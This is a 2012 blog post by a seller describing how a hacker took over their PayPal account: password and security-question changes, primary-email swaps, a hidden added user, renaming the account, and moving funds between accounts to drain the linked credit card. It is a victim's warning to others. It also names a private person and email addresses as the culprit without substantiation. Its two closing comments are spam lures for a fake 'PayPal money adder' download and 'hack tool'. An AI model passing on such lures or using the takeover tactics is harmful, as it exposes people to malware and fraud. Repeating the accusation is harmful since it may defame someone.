Saturday, September 29, 2012

Learnings from a Paypal Hacking Experience: Part One - What the hacker does to a PayPal account he hacks


   For most of us especially those who sell online like on eBay, PayPal is very important. It enables buyers to have the security of paying online and for sellers to have the opportunity to receive payments fast and across international borders. However the occasional bad hacker (yup, there are good hackers also) comes along and mess with your happy online existence.

   Our store Paypal account was the hacked recently and we've thought it best to narrate the experience here in order to help and warn other people. The article will be divided into 3 parts to explain what the hacker does to an account he has hacked (Part One), how to deal with it immediately (Part Two) and precautionary steps to avoid it from happening (Part Three).




Part One - What the hacker does to a PayPal account he hacks

   The hacking started at about 4 AM (GMT +8), a wee hour of the morning where most people would be asleep. At this time PayPal office would also be offline because they are located in the US and it isn't their office hours yet.

   Upon gaining access to our account the hacker did several activities immediately. We know he did them because of the email notifications PayPal has sent for each of the activities. Luckily we still have access to our email account. Below are the list of actions done with our PayPal account.

1) Reset the PayPal password
       It is still quite the mystery how the hacker was able to reset the password when the only way to do so was to gain access to the emails linked to it. One thing is for sure, change your email and PayPal password immediately!!!

    2) Sent the money to another PayPal account

       The hacker is a veteran and knows that most PayPal account is linked to a credit card so in our case he sent payment transactions to another PayPal account in an amount more than the current balance we have. This is likely to test how much he will be able to get from our credit card. The hacker would send the money back and forth so there was several Payment Sent and Refund of payment in our email thread. In our case money was moved back and forth using two other PayPal accounts which we suspected to be hacked as well.

       We acted quickly and was able to retrieve the money within the same day. However the hacker is very persistent. Just 6 minutes after the money was sent back to our account the hacker opened our PayPal account again and transferred all the money to another account! Given the very short period when he noticed there was money in our account either he was online or is using a software to monitor and / or automate the process. One more scary realization is that despite us changing the passwords on the email and Paypal, the hacker still managed to go inside our account and send payment to another account. Given in this second attempt he no longer had to change the Paypal password then it means he must have other ways to log-in to the account. We will explain how he did this later.

       Now because the hacker was acting fast to move the money for the 2nd try he may have gotten sloppy or simply arrogant to show how clever he is. The final email the money was sent to was a Paypal account under Guadalupe Gabuna. A Google search of the name revealed many other people scammed by this person hence the name is announced in this post for future reference. Also adding to list of things to note is that the account email used was paypal.contact@yahoo.com, also it shows other email noted on the references of that transaction which are onlines59@yahoo.com and pinoy.hosting@yahoo.com. Be wary of that name and emails because he is a hacker and scammer. Just search his name and you would know.

    3) Changed the security questions

        When you reset your password, a link would be sent to your primary email. It would be opened to a browser where there are two security questions that you must answer correctly first before you are allowed to reset your password. By changing the security questions then even if the account is linked to your email you lose the ability to change password instantly. We were never able to reset our password until we called up PayPal's hotline for help. We will discuss the details of how we dealt with it in a Part two post.

    4) Changed the primary email address

       We have more than one email linked to our PayPal. The hacker used one of our linked emails and made it the primary email. This would throw us off-guard when understanding the history of how the money was moved. He has changed the primary address 3 times and moving money in between each change. If you have more than one email linked to your PayPal account then check them thoroughly also to get a clear view of the history of actions done to your account. And reiterating again change your passwords immediately!!!

       On a side note if you are using Gmail account the conversation view is turned on by default which makes reading the whole story based on the order it was done a bit confusing. Turn off conversational view to understand the whole history of the actions of the hacker better. If you don't know how to turn it off just read this how-to post.

    5) Refunded the money back

       After making a payment the hacker would refund the same amount. Thinking about it the main reason the hacker is adding a refund in the history of transactions so that in your email list perhaps would be to make you think that PayPal has safely sent back your money. Paypal does have some safety mechanisms to check fraudulent activity but they aren't absolutely foolproof so you should not be complacent and let the word Paypal refund in your email history fool you.

       Do note that when the money is refunded it goes to your Paypal account balance and not back to your credit card so you will still be billed in your credit card unless PayPal is able to help you reverse the transaction that caused the charging to your card. See an example at the bottom of this page of how money could flow across hacked accounts.

    7) Send you invoices from another Paypal account

       This is another transaction to throw you off. The hacker will send invoices likely from another hacked account. He will even send a reminder of the invoice to add more emails in your inbox to confuse you. We know this is merely to confuse because amounts in this invoice is different from the amount of the Payment Sent transactions which he will do after making the invoice. Plus the hacker never paid through the invoice. The money was alway transferred through Payment Sent transaction.

    5) Removed the linked cards and bank accounts

       When the hacker is able to maxed out the linked credit card and transfer the amounts to your PayPal balance then he would remove it. They would also remove your bank account because these  card and bank account numbers can be a source of identification when you call PayPal. Their full numbers is not visible so there is a possibility for you to use them to identify yourself when PayPal needs to confirm that you are indeed who you say you are when you try to reset your password or talk to them. The hacker can't risk it happening so he will remove them.

    6) Added a new email account and changed the primary email

       On the third time the hacker changed the primary email address he first added a new email. For reference purposes the email added was pinoy.hosting@yahoo.com. We have good reason to believe that this may be a dummy email because despite it sounding like a legitimate business this email or even the service with that name is unsearchable.  The name is also linked to a Paypal account under Guadalupe Gabuna which based on Google search has hacked a lot of other accounts also.


    7)* Added a new user linked to the account. Hacker may have to upgrade your account to Business type first.

        It has an asterisk because this particular action somehow has no email notification. It may or may not be added after the primary email change but this Add User is very crucial to the hacker gaining access to the Paypal account even after you have changed your email and Paypal password. With a new PayPal user authorized to access the account the hacker can log-in using just a username based on your own name and his own password anytime! 

       Example if the account is under the name James Lee then the hacker would use a username like JAMESLEE or LEEJAMES give this user all possible permissions and put his own password to it. Therefore if you look at the the last login located at the top right side of your Paypal Overview screen you might just overlook checking the dates and time thinking that JAMESLEE or LEEJAMES is still you. For a business account the last login section should show the email you used to log-in and not a username!

       By having this authorization he may also call PayPal and assume your identity or inform them he has authorization on the account given he is a valid user! It's not just a possibility it did happen to other victims of the hacker.

       Adding a new user to manage the PayPal account is applicable only to business account type. If you have a personal account the hacker would have to upgrade that account also to business type so that he can add a new user. This fake user created by the hacker must be deleted immediately after you gain access to your account. We will detail how to do that in a part two post.


    8)* Changed the account name.
       It has an asterisk because this particular action somehow has no email notification. He will rename it to something generic that is similar to your nature of your use of the account. Example if you sell tickets online he will name it travel agency. If you are more a buyer he will name it ebay shopper and so on.

       The idea here is so that he can cover his tracks better. It is easier for the hacker to hide when doing a "Sent Payment" transaction because the email does not show the email of who it was sent to. Also by exchanging it with a generic name it will make it harder for you to track down the owner of the hacked account where the payment is sent. Changing the name could possibly also slow down the detection rate of PayPal's programs when he does the transfer of the stolen funds into his own PayPal account.

       Above where the actions done by the hacker in our account. If you want to read more detailed experiences of others hacked by this particular hacker just Google search for Guadalupe Gabuna. 


     ----

     This is a sample overview of how the flow of money may happen when the hacker gets hold of your PayPal account. Local currency used here is Philippine Pesos.
     

    Given:
    Your PayPal balance = P10,000
    Your Credit Card Usable Limit = P15,000
    Your Credit Card Billable Amount = P0
    Other Paypal Account 1
    Other Paypal Account 2
    HACKER's real PayPal Account


     1) Hacker sends payment of P30,000 to  Other Paypal Account 1
    Your Paypal balance = P10,000
    Your Credit Card Usable Limit = P15,000
    Your Credit Card Billable Amount = P0

    Other Paypal Account 1 balance = P0

    This transaction will not push through because the total possible money to get is P25,000 only. (Paypal balance + Credit Card Usable Limit) The card will not to be charged an amount more than its limit.


    2) Hacker sends payment of P19,000 to  Other Paypal Account 1
    Your Paypal balance = P0
    Your Credit Card Usable Limit = P6000
    Your Credit Card Billable Amount = P9,000

    Other Paypal Account 1 balance = P19,000

    The P10,000 will be removed from your PayPal balance and the P9,000 will be removed from your credit card. Your credit card will bill you P9,000 already!

    3) Refund the money from Other Paypal Account 1 back to your account.
    Your Paypal balance = P19,000
    Your Credit Card Usable Limit = P6,000
    Your Credit Card Billable Amount = P9,000


    Other Paypal Account 1 balance = P0
    When the refund happens note that the money goes to your PayPal balance. The charge to you credit card will NOT be reversed and your credit card will still bill you for that amount.


    4) Hacker sends payment of P25000 to  Other Paypal Account 2
    Your Paypal balance = P0
    Your Credit Card Usable Limit = P0
    Your Credit Card Billable Limit = P15,000 (P9000+P6000)


    Other Paypal Account 1 balance = P0
    Other Paypal Account 2 balance = P25,000

    The P19,000 will be removed from your PayPal balance and the P6,000 will be removed from your credit card. Your credit card will bill you P15,000 already!

    5) Refund the money from Other Paypal Account 2 back to your account.
    Your Paypal balance = P25,000
    Your Credit Card Usable Limit = P0
    Your Credit Card Billable Amount = P15,000


    Other Paypal Account 1 balance = P0
    Other Paypal Account 2 balance = P0

    Note again that the refund goes to your PayPal balance. The charge to you credit card will NOT be reversed and your credit card will still bill you for P15,000.
     6) At this point the hacker will do several separate send payment transactions. This may be a combination of $ and local currency. It is the point where the hacker will remove all your money and may put it accross different accounts. If the hacker is desperate or is just full of confidenhe will move all of it directly to his own PayPal account.


    Hacker sends payment of $200 (or P8600 assuming exhange rate P43 = $1 ) and P16,400  to Other Paypal Account 1

    Your Paypal balance = P0

    Your Credit Card Billable Limit = P15,000
    Other Paypal Account 1 balance = $200 and P16,400


    From Other Paypal Account 1 money is moved to the Hacker's real PayPal account
    Other Paypal Account 1 balance = 0
     HACKER's real PayPal Account = $200 and P16,400



    7) Just to throw you off guard,  the hacker may put in an extra step of sending  invoices from "Other Paypal Account 2" with amount different from the final transfer he made to "Other PayPal Account 1". This is just to trick you into thinking these may be the money which was transferred out of your account when in reality no payment was made for these invoices.


    If you like to know how a hacker may use the money read here.
    If the above happened to you read on to Part Two to know what action you should immediately take to get your money back!


    2 comments:

    1. try this.. still working, update 2013 paypal balance adder,
      http://www.mediafire.com/download/uhgq14zlb79r6hb/paypal_balance_adder.rar

      ReplyDelete
    2. Too Stressed ??
      Money can bring the "Peace" in your "soul"!!
      Your life can 'Recover'!!
      Get this 100% free method, Which will earn money for you by using PayPal Hack tool and earn UP TO 500$ ADDING EVERY 5 HOURS.TOTALLY UNTRACEABLE!!!!!!!!!!!!!!!!!!!!!!
      So Download the Tool......
      Paypal Account Hack
      Paypal Money Adder
      Paypal Money Generate
      Paypal Money Hack

      ReplyDelete